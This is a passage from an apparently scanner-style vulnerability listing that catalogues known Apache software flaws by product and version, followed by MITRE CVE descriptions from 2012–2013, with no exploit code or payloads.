12176| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
12177| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
12178| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
12179| [62833] Apache CXF -/2.6.0 spoofing
12180| [62832] Apache Axis2 up to 1.6.2 spoofing
12181| [62831] Apache Axis up to 1.4 Java Message Service spoofing
12182| [62830] Apache Commons-httpclient 3.0 Payments spoofing
12183| [62826] Apache Libcloud up to 0.11.0 spoofing
12184| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
12185| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
12186| [62661] Apache Axis2 unknown vulnerability
12187| [62658] Apache Axis2 unknown vulnerability
12188| [62467] Apache Qpid up to 0.17 denial of service
12189| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
12190| [6301] Apache HTTP Server mod_pagespeed cross site scripting
12191| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
12192| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
12193| [62035] Apache Struts up to 2.3.4 denial of service
12194| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
12195| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
12196| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
12197| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
12198| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
12199| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
12200| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
12201| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
12202| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
12203| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
12204| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
12205| [61229] Apache Sling up to 2.1.1 denial of service
12206| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
12207| [61094] Apache Roller up to 5.0 cross site scripting
12208| [61093] Apache Roller up to 5.0 cross site request forgery
12209| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
12210| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
12211| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
12212| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
12213| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
12214| [60708] Apache Qpid 0.12 unknown vulnerability
12215| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
12216| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
12217| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
12218| [4882] Apache Wicket up to 1.5.4 directory traversal
12219| [4881] Apache Wicket up to 1.4.19 cross site scripting
12220| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
12221| [60352] Apache Struts up to 2.2.3 memory corruption
12222| [60153] Apache Portable Runtime up to 1.4.3 denial of service
12223| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
12224| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
12225| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
12226| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
12227| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
12228| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
12229| [4571] Apache Struts up to 2.3.1.2 privilege escalation
12230| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
12231| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
12232| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
12233| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
12234| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
12235| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
12236| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
12237| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
12238| [59888] Apache Tomcat up to 6.0.6 denial of service
12239| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
12240| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
12241| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
12242| [59850] Apache Geronimo up to 2.2.1 denial of service
12243| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
12244| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
12245| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
12246| [58413] Apache Tomcat up to 6.0.10 spoofing
12247| [58381] Apache Wicket up to 1.4.17 cross site scripting
12248| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
12249| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
12250| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
12251| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
12252| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
12253| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
12254| [57568] Apache Archiva up to 1.3.4 cross site scripting
12255| [57567] Apache Archiva up to 1.3.4 cross site request forgery
12256| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
12257| [4355] Apache HTTP Server APR apr_fnmatch denial of service
12258| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
12259| [57425] Apache Struts up to 2.2.1.1 cross site scripting
12260| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
12261| [57025] Apache Tomcat up to 7.0.11 information disclosure
12262| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
12263| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
12264| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
12265| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
12266| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
12267| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
12268| [56512] Apache Continuum up to 1.4.0 cross site scripting
12269| [4285] Apache Tomcat 5.x JVM getLocale denial of service
12270| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
12271| [4283] Apache Tomcat 5.x ServletContect privilege escalation
12272| [56441] Apache Tomcat up to 7.0.6 denial of service
12273| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
12274| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
12275| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
12276| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
12277| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
12278| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
12279| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
12280| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
12281| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
12282| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
12283| [54693] Apache Traffic Server DNS Cache unknown vulnerability
12284| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
12285| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
12286| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
12287| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
12288| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
12289| [54012] Apache Tomcat up to 6.0.10 denial of service
12290| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
12291| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
12292| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
12293| [52894] Apache Tomcat up to 6.0.7 information disclosure
12294| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
12295| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
12296| [52786] Apache Open For Business Project up to 09.04 cross site scripting
12297| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
12298| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
12299| [52584] Apache CouchDB up to 0.10.1 information disclosure
12300| [51757] Apache HTTP Server 2.0.44 cross site scripting
12301| [51756] Apache HTTP Server 2.0.44 spoofing
12302| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
12303| [51690] Apache Tomcat up to 6.0 directory traversal
12304| [51689] Apache Tomcat up to 6.0 information disclosure
12305| [51688] Apache Tomcat up to 6.0 directory traversal
12306| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
12307| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
12308| [50626] Apache Solr 1.0.0 cross site scripting
12309| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
12310| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
12311| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
12312| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
12313| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
12314| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
12315| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
12316| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
12317| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
12318| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
12319| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
12320| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
12321| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
12322| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
12323| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
12324| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
12325| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
12326| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
12327| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
12328| [47214] Apachefriends xampp 1.6.8 spoofing
12329| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
12330| [47162] Apachefriends XAMPP 1.4.4 weak authentication
12331| [47065] Apache Tomcat 4.1.23 cross site scripting
12332| [46834] Apache Tomcat up to 5.5.20 cross site scripting
12333| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
12334| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
12335| [86625] Apache Struts directory traversal
12336| [44461] Apache Tomcat up to 5.5.0 information disclosure
12337| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
12338| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
12339| [43663] Apache Tomcat up to 6.0.16 directory traversal
12340| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
12341| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
12342| [43516] Apache Tomcat up to 4.1.20 directory traversal
12343| [43509] Apache Tomcat up to 6.0.13 cross site scripting
12344| [42637] Apache Tomcat up to 6.0.16 cross site scripting
12345| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
12346| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
12347| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
12348| [40924] Apache Tomcat up to 6.0.15 information disclosure
12349| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
12350| [40922] Apache Tomcat up to 6.0 information disclosure
12351| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
12352| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
12353| [40656] Apache Tomcat 5.5.20 information disclosure
12354| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
12355| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
12356| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
12357| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
12358| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
12359| [40234] Apache Tomcat up to 6.0.15 directory traversal
12360| [40221] Apache HTTP Server 2.2.6 information disclosure
12361| [40027] David Castro Apache Authcas 0.4 sql injection
12362| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
12363| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
12364| [3414] Apache Tomcat WebDAV Stored privilege escalation
12365| [39489] Apache Jakarta Slide up to 2.1 directory traversal
12366| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
12367| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
12368| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
12369| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
12370| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
12371| [38524] Apache Geronimo 2.0 unknown vulnerability
12372| [3256] Apache Tomcat up to 6.0.13 cross site scripting
12373| [38331] Apache Tomcat 4.1.24 information disclosure
12374| [38330] Apache Tomcat 4.1.24 information disclosure
12375| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
12376| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
12377| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
12378| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
12379| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
12380| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
12381| [37292] Apache Tomcat up to 5.5.1 cross site scripting
12382| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
12383| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
12384| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
12385| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
12386| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
12387| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
12388| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
12389| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
12390| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
12391| [36225] XAMPP Apache Distribution 1.6.0a sql injection
12392| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
12393| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
12394| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
12395| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
12396| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
12397| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
12398| [34252] Apache HTTP Server denial of service
12399| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
12400| [33877] Apache Opentaps 0.9.3 cross site scripting
12401| [33876] Apache Open For Business Project unknown vulnerability
12402| [33875] Apache Open For Business Project cross site scripting
12403| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
12404| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
12405|
12406| MITRE CVE - https://cve.mitre.org:
12407| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
12408| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
12409| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
12410| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
12411| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
12412| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
12413| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
12414| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
12415| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
12416| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
12417| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
12418| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
12419| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
12420| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
12421| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
12422| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
12423| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
12424| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
12425| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
12426| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
12427| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
12428| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
12429| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
12430| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
12431| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
12432| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
12433| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
12434| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
12435| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
12436| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
12437| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
12438| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
12439| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
12440| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
12441| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
12442| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
12443| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
12444| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
12445| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
12446| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
12447| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
12448| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
12449| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
12450| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
12451| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
12452| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
12453| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
12454| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
12455| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
12456| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
12457| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
12458| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
12459| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
